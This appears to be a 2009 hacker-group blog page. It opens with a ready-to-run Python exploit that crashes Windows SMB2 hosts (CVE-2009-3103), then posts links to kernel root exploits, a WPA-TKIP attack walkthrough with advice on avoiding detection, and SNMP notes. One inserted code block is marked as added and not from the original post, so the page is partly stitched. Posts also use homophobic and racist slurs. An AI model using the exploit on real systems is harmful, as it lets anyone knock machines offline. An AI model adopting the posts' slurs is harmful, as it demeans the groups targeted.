# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
# moded by knife to pass command line arg for IP.. wuttup priv
import sys

from socket import socket

if (len(sys.argv) >= 2):
    host = sys.argv[1], 445
    # Malformed SMB NEGOTIATE PROTOCOL REQUEST (Python 2 byte string)
    buff = (
        "\x00\x00\x00\x90" # Begin SMB header: Session message
        "\xff\x53\x4d\x42" # Server Component: SMB
        "\x72\x00\x00\x00" # Negotiate Protocol
        "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
        "\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
        "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
        "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
        "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
        "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
        "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
        "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
        "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
        "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
        "\x30\x30\x32\x00"
    )

    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()
else:
    sys.exit("Specify an IP.")

HAHA supposedly Microsoft opened this gaping security hole in SMB2 in a patch released in 2007 to fix a different, and less critical vulnerability.

From securityFocus

"Laurent Gaffié -- the researcher that disclosed a critical flaw in Microsoft's Server Message Block (SMB) version 2 code earlier this week -- said that further research pinpointed the specific patch that added the vulnerability to Windows Vista. The patch, which fixed a remote execution flaw in SMBv2 signing, was rated Important by Microsoft because the vulnerable feature was not turned on by default. The vulnerability that the patch allegedly introduced could allow an attacker to exploit an affected system in its default configuration, which usually merits a Critical rating from Microsoft."

+++

today a link to http://buglabs.net was posted in our channel. It looks slick and easy to use, and uses an ARM microprocessor. ALL great things, but is it worth it? As a more knowledgeable comrade suggested... could you not just buy an ARM development kit such as this one? And if a programmable touchscreen with simple audio in/outs and Linux is all you are after... why not a Google development phone? The first Android development editions came out late last year, and there is already much support and code. I currently play with the Arduino chip with a shitty ATmega microcontroller, so i am in the market for something of this nature. A lot to consider, but the BugLabs just seems to be gimmicky :( it reminds me of MAC. heh

MORE TO COME ON THIS TOPIC!

Thursday, September 10, 2009

Array index error in the SMB2 protocol implementation in srv2.sys in Microsoft Windows 7, Server 2008, and Vista Gold, SP1, and SP2 allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location. NOTE: some of these details are obtained from third party information.
^ from CVE-2009-3103

Although this CVE candidate only warns of a possible denial of service, other sources, primarily the MICROSOFT.COM website, warn of possible remote code execution, which could lead to a Conficker-like worm (Conficker infected millions of computers last year and on into early 2009).

here is the Microsoft advisory, which differs in wording from the CVE.

+++

on a lighter note we may have found some hosting overseas for our new dedicated host.
please make some comments if possible fellaz.

http://www.hetzner.de/en/hosting/produkte_rootserver_ds/ds3000/

http://www.isgenug.de/


http://www.hetzner.de/en/hosting/produktmatrix/rootserver-produktmatrix/

Wednesday, September 9, 2009

A vuln exists in Windows XP's and Vista's TCP flow control: incorrect handling of zero windows.

Recurity Labs CVE


and if you WordPress dummies haven't updated in the last month, you are vuln to yet another worm that will escalate itself to admin, hide, and spam your blog posts/comments with malware links etc

security focus link

Monday, September 7, 2009

the FINAL sock_sendpage() null pointer deref blog post



this is old news now, but everyone has been adding on to their blog posts and writing more and more shit. hopefully this post will pretty much be a complete list of the serious links surrounding this vuln, including exploit code.

here is a pastebin I made of vulnerable distros/kernel versions

Redhat's original article to show the problem in SELinux and mmap_min_addr

cr0.org's advisory

Linux NULL pointer dereference due to incorrect proto_ops initializations on cr0.org (best resource)

RISE security's take of it, but on Power/Cell BE arch

redhat's recommendation on mitigation for the problem.

updated Full Disclosure post

and finally THE PATCH!!! <-- do not download, iz evil

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

and the exploit links *newest to work with COW credentials I.E fedora 11

Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)

before Brad's( pretty much same as below)

wunderbar_emporium.tgz

ARM Android exploit

PPC/PPC64/x86_64/i386 exploit

Mixter throwback.

wow, i forgot all about this shlog.c code. such simplicity. write to syslog every time a shell is invoked along with the source ip. i wonder wtf mixter does these days?!?! probably a whitefag :(
remember his site http://void.mixter.ru ??? had some great articles back in the day.

an arcade in the Congo. where is amy? me amy. me pretty!

sysctl variables and useful OID lists

I see people keep asking for "full lists" of sysctl variables on various forums, so i did a "sysctl -a -d > blah.txt" on 2 systems i have access to and here are the text files. note that these will vary from system to system.

sysctl -a -d on a FreeBSD 7.0-RELEASE-p11

sysctl -a -d on a Linux 2.6.18-128.1.1.el5.028stab062.3

This made me think of the neat OIDs to be used with SNMP (Simple Network Management Protocol). You can use snmpwalk like this:

snmpwalk -v [snmp_version] -c [community] [ip_address] [object_id]

Here is a list of OIDs found on another site

CPU
Percentages of user CPU time (ssCpuUser)
.1.3.6.1.4.1.2021.11.9
Percentages of system CPU time (ssCpuSystem)
.1.3.6.1.4.1.2021.11.10
Percentages of idle CPU time (ssCpuIdle)
.1.3.6.1.4.1.2021.11.11

Load
1 minute Load (laLoad.1)
.1.3.6.1.4.1.2021.10.1.3.1
5 minute Load (laLoad.2)
.1.3.6.1.4.1.2021.10.1.3.2
15 minute Load (laLoad.3)
.1.3.6.1.4.1.2021.10.1.3.3

Memory
Total Swap Size configured for the host (memTotalSwap)
.1.3.6.1.4.1.2021.4.3
Available Swap Space on the host (memAvailSwap)
.1.3.6.1.4.1.2021.4.4

Total Real/Physical Memory Size on the host (memTotalReal)
.1.3.6.1.4.1.2021.4.5
Available Real/Physical Memory Space on the host (memAvailReal)
.1.3.6.1.4.1.2021.4.6
Total RAM Free (memTotalFree)
.1.3.6.1.4.1.2021.4.11.0
Total RAM Shared (memShared)
.1.3.6.1.4.1.2021.4.13.0
Total RAM Buffered (memBuffer)
.1.3.6.1.4.1.2021.4.14.0
Total Cached Memory (memCached)
.1.3.6.1.4.1.2021.4.15.0

Disks
Disks names (ns-disk-1-name)
.1.3.6.1.4.1.2021.9.1.2
Disks available space (ns-disk-1-avail)
.1.3.6.1.4.1.2021.9.1.7
Disks used space (ns-disk-1-used)
.1.3.6.1.4.1.2021.9.1.8
Disks use % (ns-disk-1-pct)
.1.3.6.1.4.1.2021.9.1.9

Note:
The snmpd.conf needs to be edited. Add the following (assuming a machine with a "/" and "/boot" partitions):
disk /
disk /boot

Interfaces
Interfaces Input Octets (ifInOctets)
.1.3.6.1.2.1.2.2.1.10
Interfaces Input Errors (ifInErrors)
.1.3.6.1.2.1.2.2.1.14
Interfaces Output Octets (ifOutOctets)
.1.3.6.1.2.1.2.2.1.16
Interfaces Output Errors (ifOutErrors)
.1.3.6.1.2.1.2.2.1.20
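To make the OID numbering above concrete, here is an added example (not from the original post) that hand-encodes an SNMPv2c GetRequest for one of the listed OIDs in BER, the same bytes snmpget/snmpwalk put on the wire. The community string "public" and request id are just sample values; nothing is sent.

```python
#!/usr/bin/env python3
"""Encode an SNMPv2c GetRequest for a UCD-SNMP OID by hand (added example).

Shows why the dotted OIDs above look the way they do on the wire: the first
two arcs fold into one byte (40*x + y) and arcs >= 128, such as the 2021 in
the enterprise subtree, are split into 7-bit groups. Note that in v1/v2c the
community string is carried in cleartext, which is why monitoring traffic
should stay on a management network.
"""

def ber_len(n: int) -> bytes:
    """BER length: short form below 128, else 0x80|count followed by the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, payload: bytes) -> bytes:
    """One BER tag-length-value element."""
    return bytes([tag]) + ber_len(len(payload)) + payload

def ber_int(value: int) -> bytes:
    """INTEGER (tag 0x02), minimal two's-complement encoding."""
    n = max(1, (value.bit_length() + 8) // 8)   # +8 keeps room for the sign bit
    return tlv(0x02, value.to_bytes(n, "big", signed=True))

def encode_oid(oid: str) -> bytes:
    """Content octets of an OBJECT IDENTIFIER for a dotted string like .1.3.6.1.4.1.2021.11.9"""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        groups = []
        while True:                     # base-128, most significant group first
            groups.append(arc & 0x7F)
            arc >>= 7
            if arc == 0:
                break
        groups.reverse()
        out += bytes([g | 0x80 for g in groups[:-1]] + [groups[-1]])
    return bytes(out)

def build_get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    """SNMPv2c message: SEQUENCE { version 1, community, GetRequest-PDU }."""
    varbind = tlv(0x30, tlv(0x06, encode_oid(oid)) + tlv(0x05, b""))  # OID + NULL
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0)     # error-status/index 0
              + tlv(0x30, varbind))
    return tlv(0x30, ber_int(1) + tlv(0x04, community.encode()) + pdu)

if __name__ == "__main__":
    print(build_get_request("public", ".1.3.6.1.4.1.2021.11.9").hex())
```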

WPA crack in 60 seconds? and Conficker owns London council.


the article about the Beck-Tews attack on WPA-TKIP was dropped last November, slicing the time it takes to crack a WPA encrypted key down to "12-15" minutes. "Beck-Tews" actually just refers to the "chopchop" method that has been applied to WEP in the past. It grabs a MIC (Message Integrity Check) key and plaintext from an encrypted short packet (a packet with an empty user data field) and falsifies it using the MIC key. Basically this works in WEP because of an insecure checksum: one can guess individual bytes of a packet and the access point will send an error msg if the guess is incorrect. If you do not recv an error msg, then you know you have guessed correctly, rendering this a simple matter of brute force.

In short, WPA uses Time Stamp Counters and you are led to believe this would make an attack of this nature impossible, since the initialization vector is checked in WPA... but no: if the victim uses QoS (Quality of Service) features then you have 8 channels of data flow and each has a unique time stamp. In this case you can grab an encrypted packet and execute the chopchop attack on a different channel. The only thing slowing you down is the number of MPDUs (MAC Protocol Data Units) that the MSDU + MIC key is broken down into, seeing as there is a checksum for each one. This is why we focus on the short packets (ARP & DNS), as they do not cause fragmentation.

This still doesn't help much against WPA unless the victim is using QoS. The solution is to apply this technique to a man-in-the-middle attack: if you were to hijack an encrypted ARP packet en route to the access point, the initialization vector would be larger than the Time Stamp Counter has used, because it hasn't reached its destination yet. This obviously allows the chopchop method to be used. Now it is a matter of basically setting up your station as a repeater to relay, without modification, all other information that should hit the destination from the original, while falsifying the specific packets needed. If you use directional antennas there is less chance of your malicious activity ever being noticed!

In Toshihiro Ohigashi and Masakatu Morii's paper entitled "A Practical Message Falsification Attack on WPA" they explain strategies that go even further than this, cutting the time down to a claimed ONE MINUTE.

my references include the above paper, the Temporal Key Integrity Protocol: Beck-Tews Wikipedia entry, the ZDNet blog entry from November of last year, and the recent blog entry that claimed 60 seconds.

I will end by saying this... only clueless hippy girls who just acquired a router for the first time use WEP, and now that this information is widely available, it is equally stupid not to switch over to WPA2.

___


here is some news that made me p00p a little.

LONDON COUNCIL INFECTED BY CONFICKER!


"An Ealing council employee infected the UK local authority's IT systems with the Conficker-D worm after he plugged an infected USB into a work computer, causing tens of thousands of pounds in damages in the process."

and this only makes me wonder if some guy in .ru is controlling his newest botnet recruits with twitter. article on botnets using twitter!


and isn't it ironic that some guys DDoS'ed Twitter with their botnets recently? this also reminded me of the hype of Conficker when it first hit. look at this map and take note where the infections are NOT at. i think africans are a bunch of a hakkir sleeper cells. Look at this animated movie of the spread of infection. Remind you of something?? AIDS maybe?


all bullshit aside, i just hope mosthated's best buddy kevin mitnick gets his internets back

Sunday, September 6, 2009

<@`acdc> oh, too bad
<@`acdc> that null pointer deref for bsd is for <= 6.1

+++
the vuln/exploit referred to here (proto_ops and kqueue.txt) has been in the wild for about 2 weeks now.

Below is from the Full Disclosure post in August 2009

FreeBSD <= 6.1 suffers from a classical check/use race condition on systems in the kevent() syscall, leading to a kernel mode NULL pointer dereference. It can be triggered by spawning two threads: the 1st thread looping on open() and close() syscalls, and the 2nd thread looping on kevent(), trying to add a possibly invalid file descriptor. The bug was fixed in 6.1-STABLE, just before the release of 6.2-RELEASE, but was not recognized as a security vulnerability.

the reason for this post is to point out that Przemyslaw Frasunek (hot damn what a crazy name) said on his blog

QUOTE

"yet another local root vulnerability in freebsd 6.4 kernel (will be disclosed in two weeks)"
ENDQUOTE

i have no idea when this was posted but check it out for yourself

CRAZY NAMED GUYS SITE

quad, hacking 7, and some random papers on malware and networking

as you know, my homeslice acdc is now one of the main admins of quad and we are running gentoo now. this box will continue to serve as a shellhost(primarily for irc) but a new VPS or dedicated host should be up in the near future that will cater to our more special needs. contact me, oc80z or acdc to get pricing and/or details.

and before i get to interesting things like the number 7, check out the open source projects that http://www.coresecurity.com has going on!@#$

One of my favorites is HeapDraw, now known as HeapTrace. self-explanatory.. it draws a graphic of a process's heap as it evolves. pretty neat eh? there are *nix and Windows native installs so check it out.

now Hacking the magical number 7 .. the title made me immediately think of unix permissions numbers and how 1 , 2 , and 4 can all be summed together in any combination to result in a unique integer. now that is magic! not really, and the article is actually about memory.

"Our short term memory is widely believed to have a capacity of seven elements, plus or minus 2. This assumption has influenced a number of major decisions — it’s the reason that U.S. phone numbers have seven digits, for example."

check this video, this guy is nutz...


___


after reading "A Practical Message Falsification Attack on WPA" i checked to see if the containing dir allowed for listing. some of it worthless but here is a random dir of papers.

Vulnerabilities in the SILC protocol

Obviously we need to start looking into some proof-of-concept code, and i am no whitefag trying to get the world to update, but to all your priv8teerz that own your own VPS' and dedi hosts, here is the security focus link of the advisory and update information.

Basically it is a format string vulnerability in an sscanf() function call in the HTTP part of SILCd that could allow execution of arbitrary code. no need to update silc-server.. just silc-client and silc-toolkit.

http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit_1.1.7-2+lenny1.dsc
Size/MD5 checksum: 1430 eff8a733cf7e4db92296533394f42b22
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit_1.1.7.orig.tar.gz
Size/MD5 checksum: 2678989 4f2fa6678f4801fd7087b4f92dada6ee
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit_1.1.7-2+lenny1.diff.gz
Size/MD5 checksum: 16935 1e5d1151029379a7ba135799dc1cd166
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1.1.4-1+lenny1.dsc
Size/MD5 checksum: 1380 29601c3569b30b5e3d3307689c9c25f8
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1.1.4.orig.tar.gz
Size/MD5 checksum: 2202993 979d46c78ace2dade513f33ad0081e85
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1.1.4-1+lenny1.diff.gz
Size/MD5 checksum: 11593 efa43890947e5ba7a34631c689abcb60

there are the source links, and the rest for different archs are on the security focus page.

-builder

2 recent vulnerability explanations

The first is in udp_sendmsg() and affects kernels 2.6 - 2.6.19
an exploit was posted to milw0rm first here and then another here.

finally a really good package came out called "The Rebel" and even included a nifty shell script. here is the head!

/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything

At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/

the problem in udp_sendmsg() is that the rt routing table entry is initialized as NULL, and in certain situations ip_append_data() could be called with a NULL rt, causing a NULL pointer dereference! (thank you cr0 for pointing this out)

here is a patch that should make ip_append_data() handle this better.

the explanation at the cr0 blog is very in depth and worth a read.


___

the second is in the Linux kernel getname() function, which gets information about a socket. This information is stored in the form of a sockaddr struct and is accessed from userspace by the getsockname(2) and getpeername(2) system calls. the problem lies in that uninitialized / non-memset()'ed data will be returned from the stack to userspace.

examples of this:
AF_IRDA Exploit
AF_LLC Exploit
and Clement Lecigne’s AF_APPLETALK exploit at milw0rm

and here is Jon Oberheide's excellent overview including af_irda example code.

numero uno

I am creating this for an easy way for us to share links. probably more, nothing less. For anyone who isn't familiar with our community, fuck off.

Hopefully i get some help from you guys, especially with finding/posting news -1day, but most definitely getting the links on the right side to be massive and up-to-date. General papers, official sites,tutorials etc etc. We will use the blog for more specific stuff, but the side will be more rudimentary, so excuse the lameness of some. its for reference not n00bs

I am always down to throw in some lulz, but as you know most of this will be infosec, vuln-dev, networking, and coding information and links.

and here is the first "cool guy of the week"

MJ FTW

-shekk AKA builder